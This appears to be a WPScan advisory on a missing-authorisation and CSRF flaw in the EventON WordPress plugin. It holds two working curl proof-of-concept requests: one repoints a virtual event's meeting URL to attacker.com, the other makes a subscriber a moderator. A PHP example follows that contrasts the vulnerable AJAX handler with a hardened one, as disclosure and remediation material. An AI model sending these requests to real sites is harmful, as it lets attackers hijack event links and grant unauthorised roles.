Source: wpexploit (WPScan)
Author: Erwan LR (WPScan)
WPEX-ID: 73D1B00E-1F17-4D9A-BFC8-6BC43A46B90B
Published: Jan 10, 2024 - 12:00 a.m.

EventON (Free < 2.2.9, Premium < 4.5.9) - Unauthenticated Virtual Event Settings Update

Tags: eventon, plugin, unauthenticated, virtual event, settings, vulnerability, meeting url, attack, csrf, exploit, premium, free, nonce verification

AI Score: 5.4 Medium (Confidence: High)
EPSS: 0.001 Low (Percentile: 20.7%)

Description: The plugins do not perform authorisation or CSRF (nonce) checks in some AJAX actions, allowing unauthenticated users to update virtual event settings such as the meeting URL, the moderator and the access details.

To set the Meeting URL to https://attacker.com/ on the Virtual Event with ID 240:

curl -X POST --data "event_id=240&_vir_url=https://attacker.com/" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_save_virtual_event_settings'

To set the subscriber with user ID 5 as moderator of the Virtual Event with ID 240:

curl -X POST --data "eid=240&_user_role=subscriber&_mod=5" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_save_virtual_mod_settings'

v4.5.8 of the premium plugin added capability and CSRF checks; however, the nonce verification is flawed, so the issue can still be exploited via CSRF against a logged-in user who has the required capability. Fixed versions are Free 2.2.9 and Premium 4.5.9.
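The AJAX pattern the description refers to, shown next to a hardened handler, as an added illustration in PHP. This is not EventON's own code: the callback names, the nonce action name 'eventon_virtual_nonce', the request field 'nonce' and the use of post meta under the key '_vir_url' are assumptions; only the action name eventon_save_virtual_event_settings and the event_id/_vir_url parameters come from the advisory. The same treatment applies to eventon_save_virtual_mod_settings (eid, _user_role, _mod).

```php
<?php
// Added example, not the plugin's code. Illustrates the vulnerable pattern
// described in the advisory and one correct way to fix it in WordPress.

// --- Vulnerable pattern ------------------------------------------------------
// Hooking the callback on wp_ajax_nopriv_* makes it reachable without a
// session, and nothing inside it checks who is calling or where the request
// came from. The curl commands above hit exactly this kind of handler.
add_action( 'wp_ajax_eventon_save_virtual_event_settings', 'vuln_save_virtual_event_settings' );
add_action( 'wp_ajax_nopriv_eventon_save_virtual_event_settings', 'vuln_save_virtual_event_settings' );

function vuln_save_virtual_event_settings() {
    $event_id = isset( $_POST['event_id'] ) ? (int) $_POST['event_id'] : 0;
    $url      = isset( $_POST['_vir_url'] ) ? $_POST['_vir_url'] : '';

    // No current_user_can(), no nonce: any visitor can rewrite the meeting URL.
    // ('_vir_url' as a post meta key is an assumption for this example.)
    update_post_meta( $event_id, '_vir_url', esc_url_raw( $url ) );
    wp_send_json_success();
}

// --- Hardened form -----------------------------------------------------------
// 1. No wp_ajax_nopriv_ hook: the action requires a logged-in user.
// 2. check_ajax_referer() dies on a missing or invalid nonce, so the result of
//    the nonce check cannot be ignored by accident. A check that calls
//    wp_verify_nonce() but does not act on a false return, or that only runs
//    when the nonce field is present, still leaves the action open to CSRF.
// 3. A capability check ties the change to the right to edit that event.
add_action( 'wp_ajax_eventon_save_virtual_event_settings', 'safe_save_virtual_event_settings' );

function safe_save_virtual_event_settings() {
    // Hypothetical nonce action and field names.
    check_ajax_referer( 'eventon_virtual_nonce', 'nonce' );

    $event_id = isset( $_POST['event_id'] ) ? absint( $_POST['event_id'] ) : 0;
    if ( ! $event_id || ! current_user_can( 'edit_post', $event_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $url = isset( $_POST['_vir_url'] ) ? esc_url_raw( wp_unslash( $_POST['_vir_url'] ) ) : '';
    update_post_meta( $event_id, '_vir_url', $url );
    wp_send_json_success();
}

// The client obtains the nonce from the server when the settings UI renders,
// e.g. wp_nonce_field( 'eventon_virtual_nonce', 'nonce' ) inside the form, or
// wp_create_nonce( 'eventon_virtual_nonce' ) passed to the admin script via
// wp_localize_script(). Against the hardened handler, the curl requests above
// are rejected: without a session, WordPress returns "0" for a wp_ajax_ action
// that has no nopriv hook, and with a session but no valid nonce,
// check_ajax_referer() ends the request before any setting is touched.
```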

